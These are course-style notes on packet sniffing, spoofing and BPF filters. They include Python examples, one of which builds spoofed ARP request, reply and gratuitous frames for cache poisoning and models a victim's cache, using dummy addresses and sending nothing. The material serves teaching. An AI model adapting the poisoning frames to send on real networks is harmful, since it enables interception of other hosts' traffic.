Sniff/spoof: BPF Syntax

This document discusses sniffing and spoofing network packets. It explains that promiscuous mode allows a NIC to see all network traffic while monitor mode is used for wireless NICs. Packet filtering is done using BSD Packet Filter in the kernel. Sniffing tools include raw sockets, pcap and scapy while spoofing uses raw sockets and scapy. The document also covers endianness and Address Resolution Protocol (ARP) which maps IP addresses to MAC addresses on a local network. ARP cache poisoning can be done using spoofed ARP requests, replies or gratuitous messages to associate another device's IP with the attacker's MAC address.

Uploaded by simon sylvester
Sniff/spoof

• Promiscuous mode: the NIC passes every frame it receives to the kernel. Normally only frames whose destination MAC matches the NIC's own address (plus broadcast and subscribed multicast) are passed up; all other frames are dropped in hardware.
• Monitor mode: the "promiscuous mode" of wireless NICs. It needs driver and hardware support, and because 802.11 transmissions are spread over several channels a radio only hears the channel it is currently tuned to, so capturing all traffic in the physical world is sometimes impossible (it takes channel hopping or several radios, and even then frames are lost while hopping).
• BSD Packet Filter (BPF)
  o A filtering mechanism implemented inside the kernel.
  o The filter has to run in kernel space because copying every packet from the kernel to user space is costly; with BPF only the packets that match the filter are copied, the rest are dropped in the kernel.
  o BPF syntax: a filter expression such as arp or tcp port 80 is compiled by libpcap into a small BPF program that the kernel executes on each frame.
• Packet sniffing/spoofing
  o Sniff: raw socket, pcap, scapy
  o Spoof: raw socket, scapy
• Endianness
  o Big endian: most significant byte first (e.g. network byte order, IBM PowerPC)
  o Little endian: least significant byte first (e.g. x86, Qualcomm Hexagon). Multi-byte header fields must therefore be converted (htons/ntohs, or "!" in Python's struct) when a little-endian host builds or reads packets.
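The following is an added example, not code from the original notes: a minimal interpreter for classic BPF, the program form into which libpcap compiles a filter expression and which the kernel runs on every frame. The `arp` listing is what `tcpdump -d arp` prints; the `ip and udp` listing was hand-assembled in the same format. Jump targets are written as absolute instruction numbers, as in tcpdump's disassembly (the kernel stores them as offsets). The sample frames are constructed dummies.

```python
"""Minimal classic-BPF interpreter (added example, not from the original notes).

libpcap compiles a filter expression such as ``arp`` into a tiny program of
load / compare / return instructions; the kernel runs it against every frame
and copies to user space only those for which it returns a non-zero byte
count.  Jump targets below are absolute instruction numbers as printed by
``tcpdump -d`` (the kernel stores them as relative offsets).
"""
import struct

RET_ACCEPT = 262144  # libpcap's default snaplen: "copy the whole frame"

# tcpdump -d arp
PROG_ARP = [
    ("ldh", 12),                  # A = EtherType (bytes 12-13, big endian)
    ("jeq", 0x0806, 2, 3),        # ARP? -> insn 2 (accept), else insn 3 (drop)
    ("ret", RET_ACCEPT),
    ("ret", 0),
]

# ip and udp (hand-assembled): IPv4 EtherType, then IP protocol byte at offset 23
PROG_IP_UDP = [
    ("ldh", 12),
    ("jeq", 0x0800, 2, 5),
    ("ldb", 23),                  # 14-byte Ethernet header + 9 = IP protocol
    ("jeq", 0x11, 4, 5),          # 17 = UDP
    ("ret", RET_ACCEPT),
    ("ret", 0),
]


def run_bpf(program, frame):
    """Run a classic-BPF program over one raw Ethernet frame.

    Returns the number of bytes to capture (0 = drop).  A load past the end of
    the frame terminates with 0, the same as the kernel's bounds check.
    """
    acc = 0
    pc = 0
    while 0 <= pc < len(program):
        insn = program[pc]
        op = insn[0]
        if op == "ldh":                       # 16-bit load, network byte order
            if insn[1] + 2 > len(frame):
                return 0
            acc = struct.unpack_from("!H", frame, insn[1])[0]
            pc += 1
        elif op == "ldb":                     # 8-bit load
            if insn[1] + 1 > len(frame):
                return 0
            acc = frame[insn[1]]
            pc += 1
        elif op == "jeq":                     # conditional jump on A == k
            _, k, jt, jf = insn
            pc = jt if acc == k else jf
        elif op == "ret":
            return insn[1]
        else:
            raise ValueError(f"unsupported opcode {op!r}")
    return 0                                  # fell off the end: drop


def eth_frame(ethertype, payload):
    """Constructed test frame: broadcast dst, made-up src, given EtherType."""
    return b"\xff" * 6 + b"\x02\x00\x00\x00\x00\x01" + struct.pack("!H", ethertype) + payload


# Constructed sample frames (addresses and payloads are dummies).
ARP_FRAME = eth_frame(0x0806, b"\x00" * 28)
UDP_FRAME = eth_frame(0x0800, b"\x45" + b"\x00" * 8 + b"\x11" + b"\x00" * 10)
TCP_FRAME = eth_frame(0x0800, b"\x45" + b"\x00" * 8 + b"\x06" + b"\x00" * 10)


def filter_frames(program, frames):
    """What a sniffer sees: only the frames the kernel-side program accepts."""
    return [f for f in frames if run_bpf(program, f) > 0]


if __name__ == "__main__":
    print("arp    :", [run_bpf(PROG_ARP, f) for f in (ARP_FRAME, UDP_FRAME, TCP_FRAME)])
    print("ip&udp :", [run_bpf(PROG_IP_UDP, f) for f in (ARP_FRAME, UDP_FRAME, TCP_FRAME)])
```

Note the `"!H"` in the `ldh` handler: the EtherType on the wire is big endian, so reading it in host order on an x86 machine would compare 0x0608 against 0x0806 and the `arp` filter would never match.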
ARP: Address Resolution Protocol
• Purpose of ARP: find the MAC address that corresponds to an IP address inside a local network (the same broadcast domain).
• Three ways to conduct ARP cache poisoning
  o Identities: M (attacker), A (victim), B (the host whose IP M hijacks)
  o Goal: on machine A, B's IP address is associated with M's MAC address. A records the sender pair (SPA → SHA) of every ARP message it accepts, so each variant below carries B's IP in SPA and M's MAC in SHA.
  o Using an ARP request
    ▪ Spoof a tampered request on behalf of B and send it to A (as if B were requesting A's MAC address). A caches the sender's mapping before answering, and its answer also reveals A's real MAC to M.
    ▪ ARP request
      OPER=1
      SHA=M's MAC
      SPA=B's IP
      THA=00:00:00:00:00:00 (unknown; ignored in a request)
      TPA=A's IP
  o Using an ARP reply
    ▪ ARP reply (as if B were replying to an ARP request from A)
      OPER=2
      SHA=M's MAC
      SPA=B's IP
      THA=A's MAC
      TPA=A's IP
    ▪ Caveat: an unsolicited reply is often treated as a refresh only. Linux, for example, by default (arp_accept=0) updates an entry for B's IP that is already in A's cache but does not create a new one, so this variant works best while A is actively talking to B.
  o Using a gratuitous ARP message
    ▪ Gratuitous message: a broadcast ARP message informing the entire network of an address change (hosts send one, for instance, when an interface comes up or its MAC changes).
    ▪ Characteristics: OPER=1, SPA=TPA, THA=BROADCAST
    ▪ ARP packet
      OPER=1
      SHA=M's MAC
      SPA=B's IP
      THA=BROADCAST
      TPA=B's IP
    ▪ Because it is broadcast, every host on the segment that accepts it is poisoned at once, not only A; whether it creates or only updates an entry is again OS-dependent.
• ARP cannot be used to attack remote computers: ARP is a link-layer protocol and its packets are never routed on the Internet, so M must sit on the same LAN (broadcast domain / VLAN) as A.
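The following is an added example, not code from the original notes: it builds the three poisoning messages above as raw Ethernet/ARP frames with `struct` in network byte order (the endianness point from the first section), decodes them back, and runs them through a simplified model of A's cache that creates entries from requests and gratuitous messages but only refreshes existing entries from unsolicited replies. All MAC and IP addresses are made up, the cache model is an assumption rather than any particular OS, and nothing is sent on the wire (sending would need a raw socket and root).

```python
"""Build and decode ARP cache-poisoning frames (added example, not from the notes).

Addresses are constructed dummies; the victim cache model is a simplified
assumption, not the behaviour of any specific operating system.
"""
import struct

# Constructed identities for the notes' scenario.
M_MAC = "02:00:00:00:00:0c"   # attacker
A_MAC = "02:00:00:00:00:0a"   # victim
A_IP = "10.0.0.10"
B_IP = "10.0.0.11"            # host whose IP the attacker hijacks on A
BROADCAST_MAC = "ff:ff:ff:ff:ff:ff"
ZERO_MAC = "00:00:00:00:00:00"
ETH_P_ARP = 0x0806

# ARP body (RFC 826): HTYPE PTYPE HLEN PLEN OPER SHA SPA THA TPA.
# "!" selects network byte order (big endian): OPER=1 is b"\x00\x01".
# "<" on an x86 host would silently emit b"\x01\x00" and peers would drop it.
ARP_FMT = "!HHBBH6s4s6s4s"
ARP_LEN = struct.calcsize(ARP_FMT)   # 28 bytes


def mac_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))


def ip_bytes(ip):
    return bytes(int(x) for x in ip.split("."))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def ip_str(b):
    return ".".join(str(x) for x in b)


def build_arp(oper, sha, spa, tha, tpa):
    """Serialise one ARP body for Ethernet (HTYPE=1) over IPv4 (PTYPE=0x0800)."""
    return struct.pack(ARP_FMT, 1, 0x0800, 6, 4, oper,
                       mac_bytes(sha), ip_bytes(spa), mac_bytes(tha), ip_bytes(tpa))


def parse_arp(body):
    """Decode an ARP body (what a sniffer or the victim's stack sees)."""
    _, _, _, _, oper, sha, spa, tha, tpa = struct.unpack(ARP_FMT, body[:ARP_LEN])
    return {"oper": oper, "sha": mac_str(sha), "spa": ip_str(spa),
            "tha": mac_str(tha), "tpa": ip_str(tpa)}


def eth_frame(dst, src, body):
    """Ethernet II header (dst, src, EtherType) in front of the ARP body."""
    return mac_bytes(dst) + mac_bytes(src) + struct.pack("!H", ETH_P_ARP) + body


def poison_via_request():
    """Variant 1: a request that pretends B is asking for A's MAC, unicast to A."""
    return eth_frame(A_MAC, M_MAC, build_arp(1, M_MAC, B_IP, ZERO_MAC, A_IP))


def poison_via_reply():
    """Variant 2: an unsolicited reply, as if B answered a request from A."""
    return eth_frame(A_MAC, M_MAC, build_arp(2, M_MAC, B_IP, A_MAC, A_IP))


def poison_via_gratuitous():
    """Variant 3: gratuitous ARP, broadcast, SPA == TPA == B's IP."""
    return eth_frame(BROADCAST_MAC, M_MAC, build_arp(1, M_MAC, B_IP, BROADCAST_MAC, B_IP))


def victim_cache_update(cache, frame, my_ip):
    """Simplified model (assumption) of how A's ARP cache reacts to one frame.

    Every accepted message records SPA -> SHA, which is why all three variants
    carry B's IP in SPA and M's MAC in SHA.  A request addressed to my_ip or a
    gratuitous message creates the entry; an unsolicited reply only refreshes
    an entry that already exists.  Returns the (mutated) cache.
    """
    if frame[12:14] != struct.pack("!H", ETH_P_ARP):
        return cache
    arp = parse_arp(frame[14:])
    gratuitous = arp["oper"] == 1 and arp["spa"] == arp["tpa"]
    if arp["oper"] == 1 and (arp["tpa"] == my_ip or gratuitous):
        cache[arp["spa"]] = arp["sha"]
    elif arp["oper"] == 2 and arp["tpa"] == my_ip and arp["spa"] in cache:
        cache[arp["spa"]] = arp["sha"]
    return cache


if __name__ == "__main__":
    for name, fn in (("request", poison_via_request), ("reply", poison_via_reply),
                     ("gratuitous", poison_via_gratuitous)):
        frame = fn()
        print(f"{name:10s} {frame.hex()}  ->  {parse_arp(frame[14:])}")
        print("   A's cache afterwards:", victim_cache_update({}, frame, A_IP))
```

With scapy the same three bodies would be `Ether(dst=...)/ARP(op=..., hwsrc=M_MAC, psrc=B_IP, hwdst=..., pdst=...)` sent with `sendp()`; building them by hand makes the field layout and the byte order explicit, and the cache model shows why the reply variant alone does nothing against a victim that has never talked to B.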
